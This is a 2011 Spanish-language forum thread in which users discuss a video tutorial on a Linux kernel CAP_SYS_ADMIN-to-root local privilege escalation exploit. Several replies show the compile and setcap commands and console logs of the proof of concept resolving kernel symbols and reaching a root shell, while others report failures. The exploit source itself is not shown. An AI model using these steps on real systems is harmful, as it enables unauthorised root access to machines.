elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  [Videotuto] Exploit local linux 32 y 64 bits		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: [Videotuto] Exploit local linux 32 y 64 bits  (Leído 18,757 veces)
illera88


Desconectado Desconectado

Mensajes: 397


Ver Perfil
[Videotuto] Exploit local linux 32 y 64 bits
« en: 24 Enero 2011, 20:35 pm »


Hola a todos. Estos días han sido un poco raros y aún sigo con exámenes a si que hacía bastante tiempo que no hacía un videotutorial.
En este lo que hago es una elevación de privilegios en un SO linux (en este caso Kubuntu). Este es el nombre que le han dado en Exploit-DB: Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit).
Culquier duda que tengáis ya sabéis que dejáis un comentario e intentaré solucionárosla.


La música del vídeo es a cargo de Full House (http://www.myspace.com/fullhousesalamanca) un grupo de 5 tarados que siempre están ahí cuando se les necesita. Recomiendo que escuchéis sus canciones pero nunca nunca a ellos filosofando sobre la vida, mujeres...


Espero que os guste el vídeo:

 http://www.youtube.com/embed/f4GPfuH8Hlw

FUENTE: www.metasploiter.com
« Última modificación: 24 Enero 2011, 20:40 pm por illera88 » En línea
EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: [Videotuto] Exploit local linux 32 y 64 bits
« Respuesta #1 en: 19 Febrero 2011, 15:41 pm »
No lo habia visto, hoy a la noche lo pruebo en Slackware y modifico aca avisando que tal me fue ^^

Gracias! muy bueno para tenerlo en el pendrive :P
En línea
Experimental Serial Lain [Linux User]
EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: [Videotuto] Exploit local linux 32 y 64 bits
« Respuesta #2 en: 19 Febrero 2011, 21:07 pm »
Código:
bash-4.1# setcap cap_sys_admin+ep exploit
bash-4.1# exit
exit
bash-4.1$ ./exploit 
[*] Testing Phonet support and CAP_SYS_ADMIN...
[*] Resolving kernel symbols...
[*] Failed to resolve kernel symbols.

No me funciono, no encontro CAP_SYS_ADMIN
En línea
Experimental Serial Lain [Linux User]
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: [Videotuto] Exploit local linux 32 y 64 bits
« Respuesta #3 en: 20 Febrero 2011, 01:02 am »
Funciona, pero hay que tener instalado lo siguiente,
Código
  1. alex@shellroot:~$ sudo apt-get install libcap2-bin

Output:
Código
  1. alex@shellroot:~/Escritorio$ gcc -w PoC.c -o PoC
  2.  
  3. alex@shellroot:~/Escritorio$ sudo setcap cap_sys_admin+ep PoC
  4.  
  5. alex@shellroot:~/Escritorio$ whoami
  6. alex
  7.  
  8. alex@shellroot:~/Escritorio$ ./PoC
  9. [*] Testing Phonet support and CAP_SYS_ADMIN...
  10. [*] Resolving kernel symbols...
  11.  [+] Resolved proto_tab to 0xfacd59e8
  12.  [+] Resolved pn_proto to 0xfacd5840
  13.  [+] Resolved pn_proto to 0xfacd5840
  14.  [+] Resolved commit_creds to 0xc016c960
  15.  [+] Resolved prepare_kernel_cred to 0xc016cdb0
  16. [*] Preparing fake structures...
  17. [*] Copying Structures.
  18. [*] Underflowing with offset -70
  19. [*] Elevating privlidges...
  20. [*] This was a triumph... I\'m making a note here, huge success.
  21. # whoami
  22. root
  23. #
En línea
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: [Videotuto] Exploit local linux 32 y 64 bits
« Respuesta #4 en: 20 Febrero 2011, 12:31 pm »
xD y si no lo tengo instalado cómo lo instalo? xD
Vale, un detalle...
Código:
alex@shellroot:~/Escritorio$ sudo setcap cap_sys_admin+ep PoC
¿Me descargo un programa para el que necesito ser root para conseguir ser root? Una cosilla... ¿qué es setcat? xD
En línea


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
xassiz~


Desconectado Desconectado

Mensajes: 457



Ver Perfil WWW
Re: [Videotuto] Exploit local linux 32 y 64 bits
« Respuesta #5 en: 20 Febrero 2011, 13:31 pm »
Cita de: Sagrini en 20 Febrero 2011, 12:31 pm
Una cosilla... ¿qué es setcat? xD
Citar
Name
setcap - set file capabilities

Synopsis
setcap capabilities filename [ ... capabilitiesN fileN ]

Description
setcap sets the capabilities of each specified filename to the capabilities specified. The capabilities are specified in the form described in cap_from_text(3).


The special filename, '-', can be used to indicate that capabilities are read from the standard input. In such cases, the capability set is terminated with a blank line.
:silbar:
En línea
#ka0labs
#byte-inside
#twitter
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: [Videotuto] Exploit local linux 32 y 64 bits
« Respuesta #6 en: 20 Febrero 2011, 13:50 pm »
Que se entiende como "capacidades de un archivo"?  :¬¬

Entended que eso no viene preinstalado, y si no usas algo en linux no lo utilizas. Vamos, yo no lo tengo instalado, así que el exploit no funciona.
En resumen, no es un exploit del kernel, es de un complemento del kernel. Eso es importante xD.
De todos modos buen aporte  :)

__________________________________________________

Una cosa... ¿dónde buscas qué es cada comando? En el man no sale, y en google te sale una empresa rarísima por toda la página. Si eso me lo mandas por PM que me hace falta xD; lo he buscado y ni idea :P
En línea


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
xassiz~


Desconectado Desconectado

Mensajes: 457



Ver Perfil WWW
Re: [Videotuto] Exploit local linux 32 y 64 bits
« Respuesta #7 en: 20 Febrero 2011, 13:52 pm »
Cita de: Sagrini en 20 Febrero 2011, 13:50 pm
Una cosa... ¿dónde buscas qué es cada comando? En el man no sale, y en google te sale una empresa rarísima por toda la página. Si eso me lo mandas por PM que me hace falta xD; lo he buscado y ni idea :P
Here
En línea
#ka0labs
#byte-inside
#twitter
EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: [Videotuto] Exploit local linux 32 y 64 bits
« Respuesta #8 en: 20 Febrero 2011, 18:18 pm »
Sagrini como te dijeron, el exploit lo armas en tu PC con acceso a ROOT y lo ejecutas en una maquina donde no tenga acceso a root.

yo tengo instalado libcap pero no libcap2, y es necesario que en la maquina que se ejecute tenga instalado libcap2 ????
En línea
Experimental Serial Lain [Linux User]
Lunfardo


Desconectado Desconectado

Mensajes: 568


Ver Perfil
Re: [Videotuto] Exploit local linux 32 y 64 bits
« Respuesta #9 en: 20 Febrero 2011, 19:17 pm »

Código:

[*] Testing Phonet support and CAP_SYS_ADMIN...
[*] Resolving kernel symbols...
 [+] Resolved proto_tab to 0xe255a1e8
 [+] Resolved pn_proto to 0xe255a040
 [+] Resolved pn_proto to 0xe255a040
 [+] Resolved commit_creds to 0xc016dd80
 [+] Resolved prepare_kernel_cred to 0xc016e0c0
[*] Preparing fake structures...
[*] Copying Structures.
[*] Underflowing with offset -70
Killed



=( , que habra pasado ?
En línea
Páginas: [1] 2 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Exploit para kernel Linux 2.6.x permite la elevación local de privilegios
Noticias 		wolfbcn 2 2,665 Último mensaje 12 Diciembre 2010, 20:10 pm
por Randomize
sqli+bug+exploit=videotuto
Nivel Web 		ruben_linux 4 3,427 Último mensaje 26 Agosto 2011, 13:05 pm
por ruben_linux
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines